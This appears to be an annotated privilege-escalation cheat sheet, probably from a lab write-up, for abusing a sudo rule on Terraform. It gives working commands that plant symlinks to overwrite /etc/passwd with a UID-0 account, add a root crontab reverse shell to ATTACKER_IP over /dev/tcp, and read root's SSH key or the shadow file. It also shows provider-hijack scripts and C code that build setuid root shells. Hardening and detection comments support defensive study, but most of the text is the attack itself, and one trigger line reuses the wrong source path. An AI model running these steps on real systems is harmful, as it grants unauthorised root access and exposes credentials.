# Technique 1: overwrite a root-owned file through a root-run Terraform copy
# whose destination is a symlink planted by the unprivileged user.
# NOTE(review): the configuration in /opt/examples is not shown; the comments
# below describe it as copying TF_VAR_source_path into the public/examples
# directory. Presumably the sudoers entry also lets TF_VAR_* through - confirm.
# Generate MD5 password hash
openssl passwd -1 abcd1234
# Example output: $1$xyz$abc123...
# Create malicious passwd file
mkdir -p /tmp/root/examples
cat /etc/passwd > /tmp/root/examples/passwd
# The appended entry carries UID 0 / GID 0, i.e. a second root-equivalent account.
echo 'strikoder:$1$xyz$abc123...:0:0:root:/root:/bin/bash' >> /tmp/root/examples/passwd
# Create symlink in Terraform's output directory (e.g., docker/public)
ln -s /etc/passwd /home/jeremy/docker/previous/public/examples/passwd #terraform destination path
# Trigger with sudo terraform - it copies from /tmp/root/examples/passwd to the symlink
TF_VAR_source_path=/tmp/root/examples/passwd sudo /usr/bin/terraform -chdir=/opt/examples apply
# Root cause: root runs terraform while the caller controls both an input
# variable and a directory the run writes into.
# Hardening: keep sudo's env_reset and do not env_keep TF_* variables; let the
# run write only into root-owned directories; make the copy step refuse symlinks.
# Detection: watch /etc/passwd for writes and alert on any account other than
# root that has UID 0.
# After execution: su strikoder

# Craft malicious crontab
# Technique 2: the same symlink-at-destination write, aimed at /etc/crontab.
cat /etc/crontab > /tmp/root/examples/crontab
# The appended line is a system-crontab entry (schedule, user "root", command);
# ATTACKER_IP is a placeholder on the page.
echo '* * * * * root /bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' >> /tmp/root/examples/crontab
# Create symlink
ln -s /etc/crontab /home/jeremy/docker/previous/public/examples/crontab #destination path
# Trigger with terraform - reverse shell every minute
TF_VAR_source_path=/tmp/root/examples/passwd sudo /usr/bin/terraform -chdir=/opt/examples apply
# Detection: file-integrity monitoring on /etc/crontab and /etc/cron.d, and
# alerting on cron child processes that open outbound network connections.
# Hardening: same as for any root-run copy - the destination directory must not
# be writable by the invoking user, and symlinks there should not be followed.
Read files normally restricted to root (SSH keys, shadow file, etc.)
# Technique 3: read primitive. Here the symlink is the *source*; per the page,
# the root-run copy follows it and leaves the content in the destination path.
mkdir -p /tmp/root/examples
# Symlink to target file
ln -s /root/.ssh/id_rsa /tmp/root/examples/key # or ln -s /etc/shadow /tmp/root/examples/shadow
# Configure Terraform to read the symlinked file
TF_VAR_source_path=/tmp/root/examples/key sudo terraform apply
# Hardening: restrict the source variable to a fixed, root-owned path in the
# configuration instead of accepting it from the caller's environment.
# Response: treat any key or hash that may have been copied out this way as
# exposed and rotate it.
cat output_file_in_destination_path # check destination_path

Hijack Terraform's provider mechanism to execute arbitrary code as root.
# Technique 4: provider hijack. Terraform providers are separate executables
# that terraform launches, so a root-run terraform that honours a CLI config
# chosen by the caller ends up running a caller-chosen binary as root.
# Create malicious provider
# (the script body below copies bash and sets the setuid/setgid bits on the copy)
cat > terraform-provider-example << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootshell
chmod +s /tmp/rootshell
EOF
chmod +x terraform-provider-example
# Option A: Via .terraformrc configuration
mkdir -p ~/.terraform.d/plugins
mv terraform-provider-example ~/.terraform.d/plugins/
cat > ~/.terraformrc << 'EOF'
provider_installation {
filesystem_mirror {
path = "/home/USER/.terraform.d/plugins"
}
}
EOF
# Option B: Via environment variable
export TF_CLI_CONFIG_FILE="/path/to/malicious/config"
# NOTE(review): both options only reach the root-run process if the sudo
# policy preserves HOME or TF_CLI_CONFIG_FILE - confirm against sudoers.
# Trigger execution
sudo terraform init
sudo terraform apply
# Execute SUID shell
# Hardening: do not preserve HOME / TF_* across sudo; run terraform from a
# root-owned working directory with a committed .terraform.lock.hcl; mount
# /tmp with nosuid so setuid bits there are ignored.
# Detection: alert on new setuid/setgid files outside package-managed paths.
/tmp/rootshell -p

More sophisticated provider hijacking using compiled binary.
// exploit.c
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
system("cp /bin/bash /tmp/rootbash");
system("chmod +s /tmp/rootbash");
return 0;
}
# Compile as fake provider
# Same provider-hijack idea as the script variant, with the payload built from
# exploit.c into a binary named like a provider.
gcc exploit.c -o terraform-provider-example
chmod +x terraform-provider-example
# Place in provider directory
mkdir -p /tmp/malicious-plugins
mv terraform-provider-example /tmp/malicious-plugins/
# NOTE(review): nothing in this snippet points terraform at
# /tmp/malicious-plugins; presumably a CLI config from the previous section is
# assumed - confirm.
# Execute with terraform
sudo /usr/bin/terraform -chdir=/opt/examples init
sudo /usr/bin/terraform -chdir=/opt/examples apply
# Use SUID shell
/tmp/rootbash -p
# Hardening: a sudo rule for terraform is effectively a rule for every binary
# terraform can be configured to launch; scope it to a wrapper that fixes the
# working directory, environment and CLI config, or run terraform unprivileged.
# Detection: setuid/setgid files appearing under /tmp, and compilers invoked
# by accounts that normally do not build software.